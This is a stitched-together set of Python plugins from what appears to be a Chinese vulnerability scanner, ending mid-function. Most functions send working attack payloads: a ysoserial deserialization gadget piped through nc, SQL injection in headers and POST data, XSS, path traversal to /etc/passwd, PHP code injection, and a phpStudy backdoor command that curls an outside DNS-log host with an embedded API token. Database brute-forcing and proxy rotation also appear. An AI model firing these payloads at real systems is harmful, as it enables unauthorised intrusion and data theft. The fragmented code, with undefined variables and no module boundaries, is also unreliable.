def medusa(Url,RandomAgent,UnixTimestamp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
dns=Dnslog()
os.system(
'java -jar {} CommonsCollections5 "ping {}" | nc {} {}'.format(Ysoserial().result(),dns.dns_host(),url, port))
if dns.result():
Medusa = "{}存在log4j远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n请看DNSlog数据\r\n".format(url,scheme + "://" + url +":"+ str(port))
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/5clib/property.action"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find('DEFAULT_PDF_LIB_PATH') != -1 and con.find(
'DEFAULT_SQL_BACKUP_PATH') != -1:
Medusa = "{}存在五车图书管理系统存在越权漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def Main(Url, FileName, Values, ProxyIp):
WriteFile = ClassCongregation.WriteFile(
FileName) # 声明调用类集合中的WriteFile类,并传入文件名字(这一步是必须的)
ua = ClassCongregation.UserAgentS(Values) #传入用户输入用户指定的浏览器头
RandomAgent = ua.UserAgent() #获取生成的头文件
Medusa = [
B2BbuilderBackgroundCommandExecutionVulnerability.medusa(
Url, RandomAgent, ProxyIp),
B2BbuilderContainsVulnerabilitiesLocally.medusa(
Url, RandomAgent, ProxyIp),
B2BbuilderHeadSQLInjectionVulnerability.medusa(Url, RandomAgent,
ProxyIp),
B2BbuilderSQLInjectionVulnerability.medusa(Url, RandomAgent, ProxyIp),
B2BbuilderSQLInjectionVulnerability2.medusa(Url, RandomAgent, ProxyIp),
B2BbuilderSQLInjectionVulnerability3.medusa(Url, RandomAgent, ProxyIp),
B2BbuilderSQLInjectionVulnerability4.medusa(Url, RandomAgent, ProxyIp),
]
try:
for i in tqdm(Medusa, ascii=True, desc="B2Bbuilder plugin progress"):
WriteFile.Write(str(i))
except:
pass
def medusa(**kwargs)->None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
RD=ClassCongregation.randoms().result(20)
payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1"
data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert({})%3e&submit=Submit'''.format(RD)
payload_url = url + payload
resp = requests.post(payload_url, data=data,headers=Headers,proxies=proxies, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code== 200 and con.find(RD) != -1 :
Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload_url = scheme + "://" + url + ':' + str(port) + payload
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
"Referer": payload_url,
"Cookie": "JSESSIONID=abcT_7z-8zGPy7QoU_n1w; testBanCookie=test",
"Content-Type": "application/x-www-form-urlencoded",
'User-Agent': RandomAgent,
}
resp = requests.post(payload_url,
data=post_data,
headers=headers,
timeout=10,
verify=False)
con = resp.content
code = resp.status_code
if code == 200 and (con.lower().find('system:') != -1
or con.lower().find('root:') != -1):
Medusa = "{} 存在泛微OA远程代码执行漏洞\r\n漏洞详情:\r\nPayload:{}\r\nPost:{}\r\n".format(
url, payload_url, post_data)
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def BoomDB(Url, SqlUser, SqlPasswrod, InputFileName):
if SqlUser != None or SqlPasswrod != None:
BlastingDB = ClassCongregation.BlastingDB(
SqlUser, SqlPasswrod) #只要其中账号文件或者密码文件不为空的话就开启爆破数据库功能
if InputFileName == None: #如果不是批量扫描使用就使用单独的UTL
BlastingDB.BoomDB(Url)
elif InputFileName != None: #如果是批量扫描就循环传入参数扫描
with open(InputFileName, encoding='utf-8') as f:
for UrlLine in f:
Urls = UrlLine
BlastingDB.BoomDB(Urls)
else:
pass
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/index.php"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"X-Forwarded-For":
"' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,md5(c),user,0x27,0x7e) from b2bbuilder_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1"
}
s = requests.session()
resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1:
Medusa = "{}存在B2Bbuilder头部SQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
PayloadUrl = scheme + "://" + url + ':' + str(port) + Payload
host = url + ':' + str(port)
Headers['Host'] = host
Headers[
'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
Headers['Connection'] = 'close'
try:
resp = requests.get(PayloadUrl,
headers=Headers,
proxies=proxies,
timeout=5)
con = resp.text
code = resp.status_code
if code == 200 and con.lower().find('bin') != -1 and con.lower().find(
'root') != -1:
Medusa = "{}存在Nginx_CRLF注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
url, PayloadUrl)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url,RandomAgent,ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
global resp
global resp2
try:
for payload in payloads:
payload_url = scheme+"://"+url+ ':' + str(port)+payload
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'User-Agent': RandomAgent,
}
#s = requests.session()
if ProxyIp!=None:
proxies = {
# "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https://
"http": "http://" + str(ProxyIp)
}
resp = requests.post(payload_url, data=post_data, headers=headers, proxies=proxies, timeout=5, verify=False)
elif ProxyIp==None:
resp = requests.post(payload_url, data=post_data,headers=headers, timeout=5, verify=False)
con = resp.text
code = resp.status_code
if con.lower().find('a8 management monitor')!=-1 and con.lower().find('connections stack trace')!=-1:
Medusa = "{} 存在用友OA_status存在默认密码漏洞\r\n漏洞详情:\r\nPayload:{}\r\nPost:{}\r\n".format(url, payload_url,post_data)
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
return (str(_t.info))
except:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '/admin/module_translations.php?mod=;phpinfo()'
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
}
s = requests.session()
resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("PHP Version") != -1 and con.find(
"system") != -1:
Medusa = "{}存在B2Bbuilder后台命令执行漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
for turl in urls:
try:
payload_url = scheme + "://" + url + ':' + str(
port) + turl + payload
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'User-Agent': RandomAgent,
}
resp = requests.get(payload_url,
headers=headers,
proxies=proxies,
timeout=5,
verify=False)
con = resp.text
code = resp.status_code
if con.lower().find('active internet connections') != -1:
Medusa = "{}存在用友OA_ICC系统框架漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
url, payload_url)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, ProxyIp):
scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/cdef.php?action=actions"
data = "selected_items=a:1:{i:0;s:31:" ',benchmark(10000000,md5(c)),' ";}&drp_action=1 "
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.post(payload_url,
headers=headers,
data=data,
timeout=6,
verify=False)
con = resp.text
code = resp.status_code
if con.find("4a8a08f09d37b73795649038408b5f33") != -1:
Medusa = "{}存在CactiSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
PayloadUrl = scheme + "://" + url + ':' + str(port) + Payload
host = url + ':' + str(port)
headers = {
'Host': host,
'Accept-Encoding': 'gzip, deflate',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':
'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'User-Agent': RandomAgent,
'Connection': 'close',
}
try:
s = requests.session()
resp = s.get(PayloadUrl, headers=headers, timeout=5)
con = resp.text
code = resp.status_code
if code == 200 and con.lower().find('bin') != -1 and con.lower().find(
'root') != -1:
Medusa = "{}存在Nginx_CRLF注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
url, PayloadUrl)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
for turl in urls:
try:
payload_url = scheme + "://" + url + turl + payload
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'User-Agent': RandomAgent,
}
resp = requests.get(payload_url,
headers=headers,
timeout=5,
verify=False)
con = resp.text
code = resp.status_code
if code == 500 and con.lower().find('gqxmicrosoft') != -1:
Medusa = "{}存在璐华OA系统SQL注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
url, payload_url)
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据
except:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
try:
payload_url = scheme + "://" + url + ':' + str(
port) + "/include/get_user.aspx"
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'User-Agent': RandomAgent,
}
resp = requests.get(payload_url,
headers=headers,
timeout=5,
verify=False)
con = resp.text
if con.lower().find('button_normal') != -1:
Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url)
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据
except:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1"
data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert(cscan-hyhmnn)%3e&submit=Submit'''
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.post(payload_url,
data=data,
headers=headers,
timeout=6,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find('cscan-hyhmnn') != -1:
Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, ProxyIp=None):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payloads = ["/vpn/../vpns/services.html", "/vpn/../vpns/cfg/smb.conf"]
for payload in payloads:
payload_url = scheme + '://' + url + ':' + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("encrypt password") != -1:
Medusa = "{}存在Citrix网关路径遍历漏洞\r\n 验证数据:\r\nPOC:{}\r\n返回内容:{}\r\n".format(
url, payload_url, con)
#print(Medusa)
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
payload_url = scheme+"://"+url+':'+str(port)+'/user.action'
host=url+':'+str(port)
headers = {
'Host':host,
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'User-Agent': RandomAgent,
'Connection': 'close',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '571',
'DNT': '1',
'Referer':payload_url,
'Upgrade-Insecure-Requests': '1'
}
try:
s = requests.session()
resp = s.post(payload_url, data=payload,headers=headers, timeout=5, verify=False)
con = resp.text
code = resp.status_code
if code==200 and con.lower().find('uid')!=-1 and con.lower().find('gid')!=-1 and con.lower().find('groups')!=-1:
Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n影响版本:2_0_0-2_2_3\r\nPayload:{}\r\nPost:{}\r\n".format(url, payload_url,payload)
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
global resp
global resp2
Medusas = []
try:
for payload in payloads:
payload_url = scheme + "://" + url + payload
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'User-Agent': RandomAgent,
}
#s = requests.session()
if ProxyIp != None:
proxies = {
# "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https://
"http": "http://" + str(ProxyIp)
}
resp = requests.get(payload_url,
headers=headers,
proxies=proxies,
timeout=5,
verify=False)
elif ProxyIp == None:
resp = requests.get(payload_url,
headers=headers,
timeout=5,
verify=False)
con = resp.text
code = resp.status_code
if con.lower().find('81dc9bdb52d04dc20036dbd8313ed055') != -1:
Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(
url, payload_url)
Medusas.append(str(Medusa))
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
except:
logging.warning(Url)
_ = VulnerabilityInfo('')
logging.warning(_.info.get('parameter'))
_t = VulnerabilityInfo(Medusas)
return (_t.info)
def medusa(Url, RandomAgent, ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
if str(port) not in list:
list.append(str(port)) #如果列表中不存在用户输入的端口,就把该端口发送到list里面下面好利用扫描
global resp
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
}
for payload in list:
PayloadUrl = url + ':' + payload + '/.git/config'
try:
s = requests.session()
if ProxyIp != None:
proxies = {
# "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https://
"http": "http://" + str(ProxyIp)
}
resp = s.get(PayloadUrl,
headers=headers,
proxies=proxies,
timeout=5,
verify=False)
elif ProxyIp == None:
resp = s.get(PayloadUrl,
headers=headers,
timeout=5,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.lower().find(
'repositoryformatversion') != -1:
Medusa = "{} \r\n漏洞详情:{}\r\n".format(url, PayloadUrl)
ReturnList.append(Medusa)
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
except:
logging.warning(Url)
_ = VulnerabilityInfo('')
logging.warning(_.info.get('parameter'))
_t = VulnerabilityInfo(ReturnList)
return (_t.info)
def medusa(Url,RandomAgent,ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
global resp
global resp2
Random = str(random.randint(666, 666666))
commandS = ('''system("curl http://{}_phpStudy_backdoor_{}.7ktb2x.ceye.io");''').format(url, Random)
cmd = base64.b64encode(commandS.encode('utf-8'))
try:
payload_url = scheme+"://"+url+payload
headers = {
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-User': '******',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Sec-Fetch-Site': 'none',
'accept-charset': cmd,
'Accept-Encoding': 'gzip,deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'User-Agent': RandomAgent
}
s = requests.session()
if ProxyIp!=None:
proxies = {
# "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https://
"http": "http://" + str(ProxyIp)
}
resp = s.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
elif ProxyIp==None:
resp = s.get(payload_url,headers=headers, timeout=5, verify=False)
time.sleep(5)
ceyeurl = 'http://api.ceye.io/v1/records?token=f84734983a259c598a1edeb772981d14&type=dns&filter='
try:
ceye_content = requests.get(ceyeurl, timeout=5).content
if "{}_phpStudy_backdoor_{}".format(url, Random) in ceye_content:
Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\nHeader\r\n{}".format(url, payload_url,headers)
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
return (_t.info)
except:
logging.warning(Url)
_ = VulnerabilityInfo('')
logging.warning(_.info.get('parameter'))
except Exception as e:
pass
def OpenProxy():
global RepeatCleaningAgent
RepeatCleaningAgent = 1 #检查是否是刚爬取的并清洗的IP
ProxyIpComparison = ""
try: #尝试打开文件查看是否有代理池
with open("/ScanResult/ProxyPool.txt", encoding='utf-8') as f:
try:
FileCreationYime = time.localtime(
os.path.getctime("/ScanResult/ProxyPool.txt")) # 获取文件创建时间
CurrentTime = time.localtime(time.time()) # 获取当前时间
if FileCreationYime.tm_year == CurrentTime.tm_year: # 判断年份是否相同
if CurrentTime.tm_mon == FileCreationYime.tm_mon: # 判断月份是否相同
a = FileCreationYime.tm_mday
b = CurrentTime.tm_mday
c = abs(a - b) # 计算绝对值
if c >= 3: # 如果大于3天删除
f.close() #关闭打开的文件后删除文件
os.remove("/ScanResult/ProxyPool.txt")
else:
f.close()
os.remove("/ScanResult/ProxyPool.txt")
else:
f.close()
os.remove("/ScanResult/ProxyPool.txt")
except:
pass
for ProxyPool in f: #读取代理IP进行测试是否可以使用
ProxyIps = ProxyPool[:-1] #删除换行符号\n
if ProxyIps == ProxyIpComparison: #对当前IP和上个IP进行对比如果相同代表爬取的IP全部不能用就直接跳出不在使用代理
return
ProxyIpComparison = ProxyPool[:-1]
proxies = {
#"http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https://
"http": "http://" + str(ProxyIps)
}
try:
if requests.get('https://www.baidu.com/',
proxies=proxies,
timeout=2).status_code == 200:
return ProxyIps #二次清洗完成的代理IP能用就返回
except:
pass
except:
if RepeatCleaningAgent == 1:
HttpProxy = ClassCongregation.Proxy()
HttpProxy.HttpIpProxy() #如果不存在该文件就调用爬取类
OpenProxy() #接着调用自身
else:
pass
RepeatCleaningAgent = 0 #定义全局变量防止出问题
def medusa(Url, RandomAgent, ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
PayloadUrl = scheme + "://" + url + ':' + str(port) + Payload
host = url + ':' + str(port)
headers = {
'Host': host,
'Accept-Encoding': 'gzip, deflate',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':
'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'User-Agent': RandomAgent,
'Connection': 'close',
}
s = requests.session()
try:
if ProxyIp != None:
proxies = {
# "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https://
"http": "http://" + str(ProxyIp)
}
resp = s.get(PayloadUrl,
headers=headers,
proxies=proxies,
timeout=5,
allow_redirects=False)
elif ProxyIp == None:
resp = s.get(PayloadUrl,
headers=headers,
timeout=5,
allow_redirects=False)
con = resp.headers['\rSet-Cookie']
code = resp.status_code
if code == 302 and con.lower().find('a=1') != -1:
Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, PayloadUrl)
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
return (_t.info)
except:
logging.warning(Url)
_ = VulnerabilityInfo('')
logging.warning(_.info.get('parameter'))
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "../../../../../../../../etc/passwd{{"
payload_url = scheme + "://" + url + ":" + str(port) + "/robots"
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': payload,
'Accept-Language': 'en',
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
}
s = requests.session()
resp = s.get(payload_url, headers=headers, timeout=5, verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find('root:') != -1 and con.find(
'bin:') != -1 and con.find('sys:') != -1 and con.find(
'sync:') != -1:
Medusa = "{} 存在任意文件读取漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(
url, payload_url, con.encode(encoding='utf-8'))
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
